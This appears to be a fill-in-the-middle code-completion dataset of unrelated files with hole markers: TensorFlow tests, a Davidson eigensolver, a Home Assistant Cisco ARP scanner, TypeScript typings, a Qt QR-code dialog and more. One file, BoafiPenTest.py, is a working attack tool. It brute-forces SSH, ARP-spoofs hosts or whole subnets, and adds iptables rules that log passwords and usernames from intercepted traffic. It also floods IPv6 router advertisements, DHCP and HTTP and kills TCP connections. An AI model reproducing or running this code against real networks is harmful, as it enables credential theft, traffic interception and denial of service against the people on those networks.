worker_b_dataset = distribute._RebatchDataset( dataset, batch_sizes=[1, 1, 2]) if with_prefetch: worker_b_dataset = worker_b_dataset.prefetch(1) worker_b_dataset = distribute._AutoShardDataset( worker_b_dataset, 3, 1, num_replicas=3) expected = [[2, 3], [6, 7]] self.assertDatasetProduces(worker_b_dataset, expected) worker_c_dataset = distribute._RebatchDataset( dataset, batch_sizes=[1, 2, 1]) if with_prefetch: worker_c_dataset = worker_c_dataset.prefetch(1) worker_c_dataset = distribute._AutoShardDataset( worker_c_dataset, 3, 2, num_replicas=3) expected = [[], []] self.assertDatasetProduces(worker_c_dataset, expected) class AutoShardDatasetCheckpointTest(tf_record_test_base.TFRecordTestBase, checkpoint_test_base.CheckpointTestBase, parameterized.TestCase): def setUp(self): super(AutoShardDatasetCheckpointTest, self).setUp() self._num_files = 10 self._num_records = 10 self._filenames = self._createFiles() @combinations.generate( combinations.times(test_base.default_test_combinations(), checkpoint_test_base.default_test_combinations())) def test(self, verify_fn): def build_dataset(): dataset = dataset_ops.Dataset.list_files(self._filenames, shuffle=False) dataset = dataset.apply( interleave_ops.parallel_interleave(core_readers.TFRecordDataset, 10)) dataset = distribute._AutoShardDataset(dataset, 5, 3) return dataset verify_fn(self, build_dataset, num_outputs=20) if __name__ == "__main__": test.main()<|fim▁end|>
drop_final_batch=True, use_parser_fn=None) with self.assertRaises(errors.OutOfRangeError): self.evaluate(outputs())
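The FILE/DATA distinction exercised by the auto-shard tests above can be modeled without TensorFlow: FILE sharding hands worker i every n-th file in full, while DATA sharding hands it every n-th element of the flattened record stream. This is a toy model of the semantics, not the tf.data implementation:

def shard_by_file(files, num_workers, index):
    # Worker `index` reads files index, index+num_workers, ... in full.
    return [record for f in files[index::num_workers] for record in f]

def shard_by_data(files, num_workers, index):
    # Every worker scans every file, but keeps only every num_workers-th record.
    flat = [record for f in files for record in f]
    return flat[index::num_workers]

files = [[f"Record {r} of file {f}" for r in range(10)] for f in range(10)]
# Matches the expectations in the tests: worker 3 of 5 sees files 3 and 8 ...
assert shard_by_file(files, 5, 3)[:2] == ["Record 0 of file 3", "Record 1 of file 3"]
# ... while data sharding with 5 workers keeps records 0 and 5 of each file.
assert shard_by_data(files, 5, 0)[:2] == ["Record 0 of file 0", "Record 5 of file 0"]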
<|file_name|>BoafiPenTest.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python # -*- coding: utf-8 -*- ########## boafi Pentest script ########## - Perform various pentests automatically and save reports for further study ########## - Features/TODOs: Ipv6,DHCP,DNS,NTP,exploits,mitm.. ########## - Router bruteforce for easy guessable passwords ########## - Scan networks hosts and identify vulnerabilities ########## ... ### Author: Yessou Sami ### Project Boafi ## Dependencies: dsniff(arpspoof),paramiko(ssh bruteforce),iptables,scapy import os,time,argparse,random,paramiko,socket,logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * from datetime import datetime ## Functions def brute_pass(usr,passwd,ip,port): print "Trying for "+usr+" - "+passwd ssh=paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(ip,port,usr,passwd) print "Password is: ",passwd open("foundpass","a").write("IP: "+ip+" PORT: "+port+" USER: "+usr+" PASS: "+passwd) except paramiko.AuthenticationException: print("Bad Password - "+passwd) ssh.close() except socket.error: print("Failed connection") ssh.close() def EnaLogging(): os.popen("iptables -I FORWARD -p all -j LOG --log-prefix 'GENERAL-LOG-'") #Start Logging eve,ry connection to /var/log/messages #Log also images on /tmp? os.popen("iptables -I FORWARD -p all -m string --string 'jpg' --algo kmp -j LOG --log-prefix 'JPG-LOG-'") os.popen("iptables -I FORWARD -p all -m string --string 'gif' --algo kmp -j LOG --log-prefix 'GIF-LOG-'") os.popen("iptables -I FORWARD -p all -m string --string 'png' --algo kmp -j LOG --log-prefix 'PNG-LOG-'") os.popen("iptables -I FORWARD -p all -m string --string 'mp4' --algo kmp -j LOG --log-prefix 'mp4-LOG-'") #Log urls/web request os.popen("iptables -I FORWARD -p tcp -m multiport --dports 80,443 -j LOG --log-prefix 'WWW-LOG-' ") #Log DNS os.popen("iptables -I FORWARD -p udp --dport 53 -j LOG --log-prefix 'DNS-LOG-'") #Log credentials HTTP os.popen("iptables -I FORWARD -p all -m string --string 'pass' --algo kmp -j LOG --log-prefix 'PASSWORD-LOG-'") os.popen("iptables -I FORWARD -p all -m string --string 'user' --algo kmp -j LOG --log-prefix 'USERNAME-LOG-'") ### parser = argparse.ArgumentParser() parser.add_argument('-timeout', action='store', dest='timeout', default="none", help='Define given seconds before the attack timeouts (mitm,scan,stress) if not specified will run until is killed') parser.add_argument('-RA', action='store', dest='ipv6ra', default=False, help='Flood ipv6 router advertisements for given minutes') parser.add_argument('-file', action='store', dest='output', default=False, help='File output for scans') parser.add_argument('-scan', action='store', dest='scan', default=False, help='Scan the given network address or host') ##ArpScan still in betatest.. need to fix scapy responses parser.add_argument('--arpScan', action='store_true', dest='arpscan', default=False, help='Arpscan to scan fast on LAN') parser.add_argument('--syn', action='store_true', dest='syn', default=False, help='SYN Scan enabled') parser.add_argument('--service', action='store_true', dest='service', default=False, help='Service Version detection enabled') parser.add_argument('-brute', action='store', dest='brute', default="none", help='Bruteforce SSH of given ip... 
example : -brute file-192.168.1.254:22') parser.add_argument('-mitm', action='store', dest='mitm', default="none", help='Perform MITM Attack on target') parser.add_argument('-mitmAll', action='store', dest='mitmall', default="none", help='Perform MITM Attack on all hosts') parser.add_argument('-stop-mitm', action='store_true', dest='stopmitm', default=False, help='Stop any Running MITM Attack') parser.add_argument('-denyTcp', action='store', dest='denytcp', default="none", help='Deny tcp connections of given host') parser.add_argument('--dg', action='store', dest='dg', default="none", help='Perform MITM Attack with given Default Gateway') parser.add_argument('-craft', action='store', dest='packetcraft', default=False, help='Enable Packet Crafting.. Example: -craft IP-TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80') parser.add_argument('-stress', action='store', dest='stress', default="none", help='Perform Stress Testing on LAN.. Modes: DHCPv4-50,DHCPv6') results = parser.parse_args() ### Functions def httpflood(target): ip=target try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, 80)) s.send("""GET /?="""+str(random.randrange(9999999))+""" HTTP/1.1\r\n Connection: Keep-Alive """) print """GET /"""+str(random.randrange(9999999))+""" HTTP/1.1\r\n Connection: Keep-Alive """ except ValueError: print "Host seems down or some connection error trying again..." ################## if not(results.output): output=str(time.time()) else: output=results.output syn="" scantype="-sn" #basic ping scan if not(results.timeout=="none"): timeout="timeout "+results.timeout+"s " print "\n\nTimeout set for seconds:"+results.timeout else: timeout="" if(results.scan): ipaddr=str(results.scan) if(results.arpscan): ##BETA TEST res,unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ipaddr)) output=str(res.summary( lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%"))) file=open("arpscan.txt","a") print output file.write(output) file.close() else: print ipaddr if(results.syn): scantype="-sS -O" #syn and if(results.service): scantype=scantype+" -sV" scancmd=timeout+"sudo nmap "+scantype+" -oX "+output+" "+ipaddr #writes xml output so we can convert it into html print scancmd print os.popen(scancmd).read() #ping scan to know online hosts if(results.ipv6ra): minutes=results.ipv6ra print "running for minutes: "+minutes #run ipv6 RA flooding for N minutes i=0 while (i <= minutes): print "Firing RAs everywhere" a = IPv6() a.dst = "ff02::1" #IPv6 Destination "Everyone" Multicast (broadcast) a.display() b = ICMPv6ND_RA() b.display() c = ICMPv6NDOptSrcLLAddr() c.lladdr = "00:50:56:24:3b:c0" #MAC c.display() d = ICMPv6NDOptMTU() d.display() e = ICMPv6NDOptPrefixInfo() e.prefixlen = 64 randomhex=hex(random.randint(0, 16777215))[2:].upper() prefix=randomhex[:4] e.prefix = prefix+"::" #Global Prefix e.display() send(a/b/c/d/e) # Send the packet print "Sending IPv6 RA Packet :)" time.sleep(1) i=i+1 print i if not(results.denytcp=="none"): #Works if you are the gateway or during MITM target=results.denytcp os.popen("nohup "+timeout+"tcpkill host "+target+" >/dev/null 2>&1 &") #deny tcp traffic if not(results.mitmall=="none"): #Most efficent way to arpspoof subnet ipnet=results.mitmall iplist=os.popen("nmap -sP "+ipnet+" | grep 'Nmap scan' | awk '{ print $5; }'").read() iplist=iplist.split() dgip=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read() dgip=dgip.split()[0] print "Spoofing "+dgip+"\n\n" print "Targets: \n" for ip in iplist: print ip os.popen("nohup "+timeout+"arpspoof -t "+ip+" "+dgip+" 
>/dev/null 2>&1 &") os.popen("nohup "+timeout+"urlsnarf >> visitedsites >/dev/null 2>&1 &") EnaLogging() # Enable iptables-logging if not(results.mitm=="none"): print "im in" target=results.mitm if(results.dg=="none"): #Searches for gateway dg=os.popen("ip route show | grep 'default' | awk '{print $3}' ").read() dg=dg.split()[0] print dg else: dg=results.dg #Automatically searches for gateway and arpspoof all hosts os.popen("nohup "+timeout+"arpspoof -t "+target+" "+dg+" >/dev/null 2>&1 &") os.popen("nohup "+timeout+"urlsnarf >> visitedsites &") print "Started ARP Spoof and URL Logging" #Start ARP Spoofing with given arguments or calculated ones EnaLogging() # Enable iptables-logging print "Added temp firewall rules to log MITM traffic" if(results.packetcraft): #Packet Crafting with scapy ########### PACKET CRAFTING EXAMPLE TCP-DST192.168.1.1-SRC192.168.1.10 ########### ./boafiPenTest.py -craft TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80-5<|fim▁hole|> a=IP()/TCP() elif("UDP" in craft[0]): a=IP()/UDP() if("DST" in craft[1]): ipdst=craft[1].replace("DST","") a.dst=ipdst if("SRC" in craft[2]): ipsrc=craft[2].replace("SRC","") a.src=ipsrc if("DPORT" in craft[3]): dport=craft[3].replace("DPORT","") a.dport=dport n=craft[4] ##N° of packets i=0 while(i<=n): i=i+1 a.display() send(a) print "Sent packet" if not(results.stress=="none"): try: #if it can rawstring=results.stress.split("-") mode=rawstring[0] except: print "Can't parse your command" print "\nusing default DHCPv4 stress attack" mode="DHCPv4" count=20 if("DHCPv4" in mode): # DHCPv4-50 count=int(rawstring[1]) iface = "eth0" unique_hexdigits = str.encode("".join(set(string.hexdigits.lower()))) print unique_hexdigits packet = (Ether(dst="ff:ff:ff:ff:ff:ff")/ IP(src="0.0.0.0", dst="255.255.255.255")/ UDP(sport=68, dport=67)/ BOOTP(chaddr=RandString(12, unique_hexdigits))/ DHCP(options=[("message-type", "discover"), "end"])) print "Sending dhcp requests" sendp(packet,iface=iface,count=count) if("HTTP" in mode): #HTTP-192.168.1.1-500 ip=rawstring[1] count=int(rawstring[2]) i=0 while(i<=count): i=i+1 httpflood(ip) print "Finished flooding!" if not(results.brute=="none"): # file-192.168.1.254:22 # file example : usr:pass format!! cmd=results.brute ### Parsing strings to avoid errors file=cmd.split("-")[0] ip=cmd.split("-")[1] ipparsed=ip.split(":") ip=ipparsed[0].split()[0] port=int(ipparsed[1].split()[0]) #remove spaces and then int f=open(file,"r") print "Start bruteforcing "+ip+" with list: "+file for line in f: usr=line.split(":")[0].split()[0] # remove spaces if any passwd=line.split(":")[1].split()[0] #like above brute_pass(usr,passwd,ip,port) if(results.stopmitm): #Stop MITM...hosts should re-generate ARP automatically os.popen("killall arpspoof") os.popen("killall tcpkill") # TODO ## mitm --> interact with SDS to get realtime data for visualization ## metasploit attacks? ## if connected to internet send info on "cloud"(site db) ## save data on xml,csv for webGUI visualization<|fim▁end|>
craft=(results.packetcraft).split("-") if("TCP" in craft[0]):
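The "-craft" option in the script above packs a whole packet description into one dash-separated string, and the completion begins unpacking it positionally. A small parser of the same shape (field names are illustrative and the format is assumed from the example string, not guaranteed to match the script exactly) keeps that logic testable on its own:

def parse_craft_spec(spec):
    # e.g. "TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80-5"
    parts = spec.split("-")
    return {
        "proto": parts[0],
        "dst": parts[1].replace("DST", "", 1),
        "src": parts[2].replace("SRC", "", 1),
        "dport": int(parts[3].replace("DPORT", "", 1)),
        "count": int(parts[4]),
    }

assert parse_craft_spec("TCP-DST192.168.1.1-SRC192.168.1.10-DPORT80-5") == {
    "proto": "TCP", "dst": "192.168.1.1", "src": "192.168.1.10", "dport": 80, "count": 5,
}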
<|file_name|>generate-enums.rs<|end_file_name|><|fim▁begin|>// Copyright 2015 Ilkka Rauta // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.<|fim▁hole|> mod common; mod frontend; mod demux; fn main() { frontend::generate(); demux::generate(); }<|fim▁end|>
// See the License for the specific language governing permissions and // limitations under the License.
<|file_name|>davidson.py<|end_file_name|><|fim▁begin|>"""A block Davidson solver for finding a fixed number of eigenvalues. Adapted from https://joshuagoings.com/2013/08/23/davidsons-method/ """ import time from typing import Tuple import numpy as np from tqdm import tqdm def davidson(A: np.ndarray, k: int, eig: int) -> Tuple[np.ndarray, np.ndarray]: assert len(A.shape) == 2 assert A.shape[0] == A.shape[1] n = A.shape[0] ## set up subspace and trial vectors # set of k unit vectors as guess t = np.eye(n, k) # hold guess vectors V = np.zeros((n, n)) I = np.eye(n) for m in tqdm(range(k, mmax, k)): if m <= k: for j in range(k): V[:, j] = t[:, j] / np.linalg.norm(t[:, j]) theta_old = 1 elif m > k: theta_old = theta[:eig] V, R = np.linalg.qr(V) T = V[:, : (m + 1)].T @ A @ V[:, : (m + 1)] THETA, S = np.linalg.eig(T) idx = THETA.argsort() theta = THETA[idx] s = S[:, idx] for j in range(k): w = (A - theta[j] * I) @ V[:, : (m + 1)] @ s[:, j] q = w / (theta[j] - A[j, j]) V[:, (m + j + 1)] = q norm = np.linalg.norm(theta[:eig] - theta_old) if norm < tol: break return theta, V if __name__ == "__main__": # dimension of problem n = 1200 # convergence tolerance tol = 1e-8 # maximum number of iterations mmax = n // 2 ## set up fake Hamiltonian sparsity = 1.0e-4 A = np.zeros((n, n)) for i in range(0, n): A[i, i] = i + 1 A = A + sparsity * np.random.randn(n, n) A = (A.T + A) / 2 # number of initial guess vectors k = 8 # number of eigenvalues to solve eig = 4 start_davidson = time.time() theta, V = davidson(A, k, eig) end_davidson = time.time() print(f"davidson = {theta[:eig]}; {end_davidson - start_davidson} seconds")<|fim▁hole|> end_numpy = time.time() print(f"numpy = {E[:eig]}; {end_numpy - start_numpy} seconds")<|fim▁end|>
start_numpy = time.time() E, Vec = np.linalg.eig(A) E = np.sort(E)
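For the kind of diagonally dominant test matrix built in the Davidson script above, the lowest eigenvalues from a full dense solve and from an iterative sparse eigensolver should agree closely. A quick cross-check using SciPy's eigsh (a sanity check on the test problem, not the Davidson routine itself; the size and tolerance are arbitrary):

import numpy as np
from scipy.sparse.linalg import eigsh

n, sparsity, eig = 400, 1.0e-4, 4
A = np.diag(np.arange(1.0, n + 1)) + sparsity * np.random.randn(n, n)
A = (A + A.T) / 2  # symmetrize, as in the script above

dense = np.sort(np.linalg.eigvalsh(A))[:eig]          # reference answer
iterative = np.sort(eigsh(A, k=eig, which="SA")[0])   # smallest-algebraic eigenvalues
assert np.allclose(dense, iterative, atol=1e-6)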
<|file_name|>device_tracker.py<|end_file_name|><|fim▁begin|>"""Support for Cisco IOS Routers.""" import logging import re from pexpect import pxssh import voluptuous as vol from homeassistant.components.device_tracker import ( DOMAIN, PLATFORM_SCHEMA as PARENT_PLATFORM_SCHEMA, DeviceScanner, ) from homeassistant.const import CONF_HOST, CONF_PASSWORD, CONF_PORT, CONF_USERNAME import homeassistant.helpers.config_validation as cv _LOGGER = logging.getLogger(__name__) PLATFORM_SCHEMA = vol.All( PARENT_PLATFORM_SCHEMA.extend( { vol.Required(CONF_HOST): cv.string, vol.Required(CONF_USERNAME): cv.string, vol.Optional(CONF_PASSWORD, default=""): cv.string, vol.Optional(CONF_PORT): cv.port, } ) ) def get_scanner(hass, config): """Validate the configuration and return a Cisco scanner.""" scanner = CiscoDeviceScanner(config[DOMAIN]) return scanner if scanner.success_init else None class CiscoDeviceScanner(DeviceScanner): """This class queries a wireless router running Cisco IOS firmware.""" def __init__(self, config): """Initialize the scanner.""" self.host = config[CONF_HOST] self.username = config[CONF_USERNAME] self.port = config.get(CONF_PORT) self.password = config[CONF_PASSWORD] self.last_results = {} self.success_init = self._update_info() _LOGGER.info("Initialized cisco_ios scanner") def get_device_name(self, device): """Get the firmware doesn't save the name of the wireless device.""" return None def scan_devices(self): """Scan for new devices and return a list with found device IDs.""" self._update_info() return self.last_results def _update_info(self): """ Ensure the information from the Cisco router is up to date. Returns boolean if scanning successful. """ string_result = self._get_arp_data() if string_result: self.last_results = [] last_results = [] lines_result = string_result.splitlines() # Remove the first two lines, as they contains the arp command # and the arp table titles e.g. # show ip arp # Protocol Address | Age (min) | Hardware Addr | Type | Interface lines_result = lines_result[2:] for line in lines_result: parts = line.split() if len(parts) != 6: continue # ['Internet', '10.10.11.1', '-', '0027.d32d.0123', 'ARPA', # 'GigabitEthernet0'] age = parts[2] hw_addr = parts[3]<|fim▁hole|> if age != "-": mac = _parse_cisco_mac_address(hw_addr) age = int(age) if age < 1: last_results.append(mac) self.last_results = last_results return True return False def _get_arp_data(self): """Open connection to the router and get arp entries.""" try: cisco_ssh = pxssh.pxssh() cisco_ssh.login( self.host, self.username, self.password, port=self.port, auto_prompt_reset=False, ) # Find the hostname initial_line = cisco_ssh.before.decode("utf-8").splitlines() router_hostname = initial_line[len(initial_line) - 1] router_hostname += "#" # Set the discovered hostname as prompt regex_expression = f"(?i)^{router_hostname}".encode() cisco_ssh.PROMPT = re.compile(regex_expression, re.MULTILINE) # Allow full arp table to print at once cisco_ssh.sendline("terminal length 0") cisco_ssh.prompt(1) cisco_ssh.sendline("show ip arp") cisco_ssh.prompt(1) devices_result = cisco_ssh.before return devices_result.decode("utf-8") except pxssh.ExceptionPxssh as px_e: _LOGGER.error("Failed to login via pxssh: %s", px_e) return None def _parse_cisco_mac_address(cisco_hardware_addr): """ Parse a Cisco formatted HW address to normal MAC. e.g. 
convert 001d.ec02.07ab to: 00:1D:EC:02:07:AB Takes in cisco_hwaddr: HWAddr String from Cisco ARP table Returns a regular standard MAC address """ cisco_hardware_addr = cisco_hardware_addr.replace(".", "") blocks = [ cisco_hardware_addr[x : x + 2] for x in range(0, len(cisco_hardware_addr), 2) ] return ":".join(blocks).upper()<|fim▁end|>
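The address rewrite done by _parse_cisco_mac_address is easy to spot-check on its own: strip the dots, regroup the hex digits into byte pairs, and upper-case. A standalone restatement of the same transform:

def cisco_to_standard_mac(dotted: str) -> str:
    # "001d.ec02.07ab" -> "00:1D:EC:02:07:AB"
    digits = dotted.replace(".", "")
    pairs = [digits[i:i + 2] for i in range(0, len(digits), 2)]
    return ":".join(pairs).upper()

assert cisco_to_standard_mac("001d.ec02.07ab") == "00:1D:EC:02:07:AB"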
<|file_name|>index.d.ts<|end_file_name|><|fim▁begin|>/* * @license Apache-2.0 * * Copyright (c) 2019 The Stdlib Authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // TypeScript Version: 2.0 /** * Evaluates the cumulative distribution function (CDF) for a uniform distribution. * * @param x - input value * @returns evaluated CDF */ type Unary = ( x: number ) => number; /** * Interface for the cumulative distribution function (CDF) of a uniform distribution. */ interface CDF { /** * Evaluates the cumulative distribution function (CDF) for a uniform distribution with minimum support `a` and maximum support `b` at a value `x`. * * ## Notes * * - If provided `a >= b`, the function returns `NaN`. * * @param x - input value * @param a - minimum support * @param b - maximum support * @returns evaluated CDF * * @example * var y = cdf( 9.0, 0.0, 10.0 ); * // returns 0.9 * * @example * var y = cdf( 0.5, 0.0, 2.0 ); * // returns 0.25 * * @example * var y = cdf( +Infinity, 2.0, 4.0 ); * // returns 1.0 * * @example * var y = cdf( -Infinity, 2.0, 4.0 ); * // returns 0.0 * * @example * var y = cdf( NaN, 0.0, 1.0 ); * // returns NaN * * @example * var y = cdf( 0.0, NaN, 1.0 ); * // returns NaN * * @example * var y = cdf( 0.0, 0.0, NaN ); * // returns NaN * * @example * var y = cdf( 2.0, 1.0, 0.0 ); * // returns NaN */ ( x: number, a: number, b: number ): number; /** * Returns a function for evaluating the cumulative distribution function (CDF) for a uniform distribution with minimum support `a` and maximum support `b`. * * @param a - minimum support * @param b - maximum support * @returns CDF * * @example * var mycdf = cdf.factory( 0.0, 10.0 ); * var y = mycdf( 0.5 ); * // returns 0.05 * * y = mycdf( 8.0 ); * // returns 0.8 */ factory( a: number, b: number ): Unary; } /** * Uniform distribution cumulative distribution function (CDF).<|fim▁hole|>* @param b - maximum support * @returns evaluated CDF * * @example * var y = cdf( 5.0, 0.0, 4.0 ); * // returns 1.0 * * var mycdf = cdf.factory( 0.0, 10.0 ); * y = mycdf( 0.5 ); * // returns 0.05 * * y = mycdf( 8.0 ); * // returns 0.8 */ declare var cdf: CDF; // EXPORTS // export = cdf;<|fim▁end|>
* * @param x - input value * @param a - minimum support
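The behaviour documented in these typings — F(x) = (x - a) / (b - a) clamped to [0, 1], with NaN when any input is NaN or when a >= b — is compact enough to restate as a reference implementation in Python:

import math

def uniform_cdf(x: float, a: float, b: float) -> float:
    # NaN inputs or an inverted/empty support propagate NaN, as the typings describe.
    if any(map(math.isnan, (x, a, b))) or a >= b:
        return math.nan
    if x < a:
        return 0.0
    if x > b:
        return 1.0
    return (x - a) / (b - a)

# Matches the @example values in the declaration file.
assert uniform_cdf(9.0, 0.0, 10.0) == 0.9
assert uniform_cdf(0.5, 0.0, 2.0) == 0.25
assert math.isnan(uniform_cdf(2.0, 1.0, 0.0))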
<|file_name|>data_prepper.py<|end_file_name|><|fim▁begin|>import numpy as np import jarvis.helpers.helpers as helpers from data_cleaner import DataCleaner def get_data(csv=None, sep='|'): dataset = create_dataset(csv, sep) inputs = DataCleaner().clean(dataset[:, 0:1]) outputs = format_targets(dataset[:, 1]) train_data, test_data = inputs[::2], inputs[1::2] train_targets, test_targets = outputs[::2], outputs[1::2] return [(train_data, train_targets), (test_data, test_targets)] def create_dataset(csv, sep): if csv: return helpers.read_csv(csv, sep=sep).values else: data = [] for f in helpers.csvs(): for row in helpers.read_csv(f, sep=sep).values: data.append(list(row)) return np.array(data) def format_targets(target_list): target_map = {} index = 0 actions = helpers.get_actions() # Map targets to their index inside of actions array<|fim▁hole|> return map(lambda target: target_map[target], target_list)<|fim▁end|>
for action in actions: target_map[action] = index index += 1
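The label encoding and even/odd train/test split used in get_data above can be written as two pure functions, which makes the indexing easy to verify in isolation (illustrative, independent of the jarvis helpers):

def build_target_map(actions):
    # Each action name maps to its position in the actions list.
    return {action: index for index, action in enumerate(actions)}

def even_odd_split(rows):
    # Even-indexed rows become training data, odd-indexed rows become test data.
    return rows[::2], rows[1::2]

target_map = build_target_map(["greet", "weather", "music"])
assert [target_map[t] for t in ["music", "greet"]] == [2, 0]

train, test = even_odd_split([0, 1, 2, 3, 4])
assert train == [0, 2, 4] and test == [1, 3]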
<|file_name|>newport_group.py<|end_file_name|><|fim▁begin|># =============================================================================== # Copyright 2011 Jake Ross # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # =============================================================================== # ============= enthought library imports ======================= from traits.api import Float, Tuple # ============= standard library imports ======================== # ============= local library imports ========================== from pychron.core.helpers.strtools import csv_to_ints from pychron.hardware.axis import Axis MAPPING = dict( acceleration="HA", deceleration="HD", # emergency_deceleration = 'HE', jerk="HJ", velocity="HV", axes="HN", ) class NewportGroup(Axis): # acceleration = Float # deceleration = Float emergency_deceleration = None jerk = Float # velocity = Float name = "GroupedAxes" machine_velocity = Float machine_acceleration = Float machine_deceleration = Float axes = Tuple # calculate_parameters = Bool(True) id = None def _set_acceleration(self, v): self._acceleration = v <|fim▁hole|> def _set_velocity(self, v): self._velocity = v def load(self, path): config = self.get_configuration(path) for attr in [ "acceleration", "deceleration", # 'emergency_deceleration', "jerk", "velocity", ]: self.set_attribute(config, attr, "General", attr, cast="float") self.set_attribute(config, "id", "General", "id", cast="int") axes = self.config_get(config, "General", "axes") self.axes = tuple(csv_to_ints(axes)) self.nominal_velocity = self.velocity self.nominal_acceleration = self.acceleration self.nominal_deceleration = self.deceleration def build_command(self, new_group): cmds = [] for key, value in MAPPING.items(): if key is not "axes": cmds.append("{}{}{:0.5f}".format(self.id, value, getattr(self, key))) if new_group: gid = "{:n}HN{}".format(self.id, ",".join(map(str, self.axes))) cmds = [gid] + cmds return ";".join(cmds) # ============= EOF ==============================================<|fim▁end|>
def _set_deceleration(self, v): self._deceleration = v
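build_command in the NewportGroup class above concatenates one "<group id><mnemonic><value>" token per parameter and joins them with semicolons, prefixing an axis-assignment command when a new group is created. The string assembly can be exercised without the hardware layer (mnemonics copied from the MAPPING dict; the group id and values are made up):

MAPPING = {"acceleration": "HA", "deceleration": "HD", "jerk": "HJ", "velocity": "HV"}

def build_group_command(group_id, params, axes=None):
    # One "<id><mnemonic><value>" token per parameter, ';'-separated,
    # optionally prefixed by the axis-assignment command for a new group.
    cmds = ["{}{}{:0.5f}".format(group_id, MAPPING[key], value)
            for key, value in params.items()]
    if axes is not None:
        cmds.insert(0, "{}HN{}".format(group_id, ",".join(map(str, axes))))
    return ";".join(cmds)

print(build_group_command(1, {"velocity": 2.5, "acceleration": 8.0}, axes=(1, 2)))
# -> "1HN1,2;1HV2.50000;1HA8.00000"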
<|file_name|>qrcodedialog.cpp<|end_file_name|><|fim▁begin|>#include "qrcodedialog.h" #include "ui_qrcodedialog.h" #include "bitcoinunits.h" #include "guiconstants.h" #include "guiutil.h" #include "optionsmodel.h" #include <QPixmap> #include <QUrl> #include <qrencode.h> QRCodeDialog::QRCodeDialog(const QString &addr, const QString &label, bool enableReq, QWidget *parent) : QDialog(parent), ui(new Ui::QRCodeDialog), model(0), address(addr) { ui->setupUi(this); setWindowTitle(QString("%1").arg(address)); ui->chkReqPayment->setVisible(enableReq); ui->lblAmount->setVisible(enableReq); ui->lnReqAmount->setVisible(enableReq); ui->lnLabel->setText(label); ui->btnSaveAs->setEnabled(false); genCode(); } QRCodeDialog::~QRCodeDialog() { delete ui; } void QRCodeDialog::setModel(OptionsModel *model) { this->model = model; if (model) connect(model, SIGNAL(displayUnitChanged(int)), this, SLOT(updateDisplayUnit())); // update the display unit, to not use the default ("BTC") updateDisplayUnit(); } void QRCodeDialog::genCode() { QString uri = getURI(); if (uri != "") { ui->lblQRCode->setText(""); QRcode *code = QRcode_encodeString(uri.toUtf8().constData(), 0, QR_ECLEVEL_L, QR_MODE_8, 1); if (!code) { ui->lblQRCode->setText(tr("Error encoding URI into QR Code.")); return; } myImage = QImage(code->width + 8, code->width + 8, QImage::Format_RGB32); myImage.fill(0xffffff); unsigned char *p = code->data; for (int y = 0; y < code->width; y++) { for (int x = 0; x < code->width; x++) { myImage.setPixel(x + 4, y + 4, ((*p & 1) ? 0x0 : 0xffffff)); p++; } } QRcode_free(code);<|fim▁hole|> ui->lblQRCode->setPixmap(QPixmap::fromImage(myImage).scaled(300, 300)); ui->outUri->setPlainText(uri); } } QString QRCodeDialog::getURI() { QString ret = QString("elcoin:%1").arg(address); int paramCount = 0; ui->outUri->clear(); if (ui->chkReqPayment->isChecked()) { if (ui->lnReqAmount->validate()) { // even if we allow a non BTC unit input in lnReqAmount, we generate the URI with BTC as unit (as defined in BIP21) ret += QString("?amount=%1").arg(BitcoinUnits::format(BitcoinUnits::BTC, ui->lnReqAmount->value())); paramCount++; } else { ui->btnSaveAs->setEnabled(false); ui->lblQRCode->setText(tr("The entered amount is invalid, please check.")); return QString(""); } } if (!ui->lnLabel->text().isEmpty()) { QString lbl(QUrl::toPercentEncoding(ui->lnLabel->text())); ret += QString("%1label=%2").arg(paramCount == 0 ? "?" : "&").arg(lbl); paramCount++; } if (!ui->lnMessage->text().isEmpty()) { QString msg(QUrl::toPercentEncoding(ui->lnMessage->text())); ret += QString("%1message=%2").arg(paramCount == 0 ? "?" 
: "&").arg(msg); paramCount++; } // limit URI length to prevent a DoS against the QR-Code dialog if (ret.length() > MAX_URI_LENGTH) { ui->btnSaveAs->setEnabled(false); ui->lblQRCode->setText(tr("Resulting URI too long, try to reduce the text for label / message.")); return QString(""); } ui->btnSaveAs->setEnabled(true); return ret; } void QRCodeDialog::on_lnReqAmount_textChanged() { genCode(); } void QRCodeDialog::on_lnLabel_textChanged() { genCode(); } void QRCodeDialog::on_lnMessage_textChanged() { genCode(); } void QRCodeDialog::on_btnSaveAs_clicked() { QString fn = GUIUtil::getSaveFileName(this, tr("Save QR Code"), QString(), tr("PNG Images (*.png)")); if (!fn.isEmpty()) myImage.scaled(EXPORT_IMAGE_SIZE, EXPORT_IMAGE_SIZE).save(fn); } void QRCodeDialog::on_chkReqPayment_toggled(bool fChecked) { if (!fChecked) // if chkReqPayment is not active, don't display lnReqAmount as invalid ui->lnReqAmount->setValid(true); genCode(); } void QRCodeDialog::updateDisplayUnit() { if (model) { // Update lnReqAmount with the current unit ui->lnReqAmount->setDisplayUnit(model->getDisplayUnit()); } }<|fim▁end|>
